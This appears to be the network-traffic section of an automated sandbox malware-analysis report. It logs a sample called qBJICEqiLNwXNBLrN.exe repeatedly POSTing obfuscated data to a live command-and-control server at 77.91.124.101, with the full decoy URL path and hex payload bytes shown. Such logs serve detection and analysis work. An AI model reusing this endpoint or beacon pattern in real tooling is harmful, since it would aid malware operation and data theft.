                                                            80 | 192.168.2.5 | 49795 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:20.236531973 CET | 486 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:20.434251070 CET | 486 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:20.434470892 CET | 488 | OUT | Data Raw: 52 5b 58 50 5e 58 5f 5a 5d 57 55 57 55 58 57 55 50 52 58 48 56 5e 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[XP^X_Z]WUWUXWUPRXHV^W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\')1_?(:? '[8*^"9!]?Q'-!&#!-"]>,8>&G''^)?
                                                            Nov 21, 2023 04:48:20.636868000 CET | 489 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:20 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            81 | 192.168.2.5 | 49796 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:20.957691908 CET | 490 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:21.155589104 CET | 490 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:21.155800104 CET | 492 | OUT | Data Raw: 57 51 5d 5c 5b 5e 5a 5f 5d 57 55 57 55 5b 57 52 50 5b 58 41 56 5f 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WQ]\[^Z_]WUWU[WRP[XAV_WR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X);*=+>/B&4*+30[%0,+<<<,&G''^)3
                                                            Nov 21, 2023 04:48:21.366157055 CET | 493 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:21 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            82 | 77.91.124.101 | 80 | 192.168.2.5 | 49797 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:21.689570904 CET | 493 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:21.886193037 CET | 494 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:21.886437893 CET | 496 | OUT | Data Raw: 57 5b 5d 5c 5b 5f 5a 50 5d 57 55 57 55 5f 57 51 50 59 58 43 56 57 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[]\[_ZP]WUWU_WQPYXCVWWX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)*(R?#(8.\ )!]<0!$!3 )-5<,$,&G''^)#
                                                            Nov 21, 2023 04:48:22.088074923 CET | 497 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:21 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
83 | 192.168.2.5 | 49798 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:48:22.411200047 CET | 498 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 77.91.124.101
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Nov 21, 2023 04:48:22.609960079 CET | 498 | IN | HTTP/1.1 100 Continue
Nov 21, 2023 04:48:22.791090012 CET | 499 | IN | HTTP/1.1 200 OK
Date: Tue, 21 Nov 2023 03:48:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
84 | 77.91.124.101 | 80 | 192.168.2.5 | 49799 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:48:22.787108898 CET | 498 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 77.91.124.101
Content-Length: 1380
Expect: 100-continue
Connection: Keep-Alive
Nov 21, 2023 04:48:22.984966040 CET | 500 | IN | HTTP/1.1 100 Continue
Nov 21, 2023 04:48:22.988972902 CET | 501 | OUT | Data (request body)
Nov 21, 2023 04:48:23.191557884 CET | 504 | IN | HTTP/1.1 200 OK
Date: Tue, 21 Nov 2023 03:48:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 152
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
85 | 192.168.2.5 | 49800 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:48:22.909718037 CET | 500 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 77.91.124.101
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Nov 21, 2023 04:48:23.108768940 CET | 501 | IN | HTTP/1.1 100 Continue
Nov 21, 2023 04:48:23.108985901 CET | 504 | OUT | Data (request body)
Nov 21, 2023 04:48:23.312886953 CET | 505 | IN | HTTP/1.1 200 OK
Date: Tue, 21 Nov 2023 03:48:22 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 33 58 5b 55
Data Ascii: 3X[U


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
86 | 192.168.2.5 | 49801 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:48:23.625998974 CET | 505 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 77.91.124.101
Content-Length: 2544
Expect: 100-continue
Nov 21, 2023 04:48:23.822474003 CET | 506 | IN | HTTP/1.1 100 Continue
Nov 21, 2023 04:48:23.822760105 CET | 508 | OUT | Data (request body)
Nov 21, 2023 04:48:24.026417971 CET | 509 | IN | HTTP/1.1 200 OK
Date: Tue, 21 Nov 2023 03:48:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Content-Type: text/html; charset=UTF-8
Data Raw: 33 58 5b 55
Data Ascii: 3X[U


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
87 | 77.91.124.101 | 80 | 192.168.2.5 | 49802 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
Timestamp | kBytes transferred | Direction | Data
Nov 21, 2023 04:48:24.347886086 CET | 509 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Host: 77.91.124.101
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Nov 21, 2023 04:48:24.546761036 CET | 509 | IN | HTTP/1.1 100 Continue
Nov 21, 2023 04:48:24.546966076 CET | 512 | OUT | Data (request body)
Nov 21, 2023 04:48:24.749294043 CET | 512 | IN | HTTP/1.1 200 OK
Date: Tue, 21 Nov 2023 03:48:24 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Data Raw: 33 58 5b 55
Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            8877.91.124.10180192.168.2.549803C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:25.067761898 CET513OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:25.277538061 CET513INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:25.479048967 CET | 516 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:25 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            89 | 77.91.124.101 | 80 | 192.168.2.5 | 49804 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:25.800508976 CET | 517 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:25.999167919 CET | 517 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:26.209800005 CET | 520 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:25 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            9 | 192.168.2.5 | 49721 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:47:32.397201061 CET | 178 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:32.596981049 CET | 179 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:32.802401066 CET | 184 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:32 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            90 | 77.91.124.101 | 80 | 192.168.2.5 | 49805 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:26.539843082 CET | 521 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:26.737345934 CET | 521 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:26.941642046 CET | 524 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:26 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            91 | 77.91.124.101 | 80 | 192.168.2.5 | 49806 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:27.268814087 CET | 525 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:27.467691898 CET | 525 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:27.673158884 CET | 528 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:27 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            92 | 77.91.124.101 | 80 | 192.168.2.5 | 49807 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:27.988404036 CET | 529 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2532
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:28.185064077 CET | 529 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:28.386883974 CET | 532 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:28 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            93 | 192.168.2.5 | 49808 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:28.395704985 CET | 533 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 1408
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:28.592679977 CET | 534 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:28.794825077 CET | 538 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:28 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Vary: Accept-Encoding
                                                            Content-Length: 152
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            94 | 77.91.124.101 | 80 | 192.168.2.5 | 49809 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:28.519782066 CET | 534 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:28.718663931 CET | 535 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:28.922313929 CET | 539 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:28 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            95 | 192.168.2.5 | 49810 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:29.236812115 CET | 540 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:29.434954882 CET | 540 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:29.637830973 CET | 543 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:29 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            96 | 192.168.2.5 | 49811 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:29.957750082 CET | 543 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:30.160639048 CET | 544 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:30.369224072 CET | 546 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:30 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            97 | 192.168.2.5 | 49812 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:30.689914942 CET | 547 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:30.886128902 CET | 547 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:31.087574005 CET | 550 | IN | HTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:30 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                            98 | 192.168.2.5 | 49813 | 77.91.124.101 | 80 | C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            Timestamp | kBytes transferred | Direction | Data
                                                            Nov 21, 2023 04:48:31.409105062 CET | 551 | OUT | POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:31.608257055 CET | 551 | IN | HTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:31.608489990 CET | 554 | OUT | Data Raw: 52 5f 5d 5a 5b 52 5a 5c 5d 57 55 57 55 5b 57 52 50 5c 58 46 56 54 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R_]Z[RZ\]WUWU[WRP\XFVTWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'Y=^=?;.R= ,["9"<#.R3-R009,+=??,&G''^)3
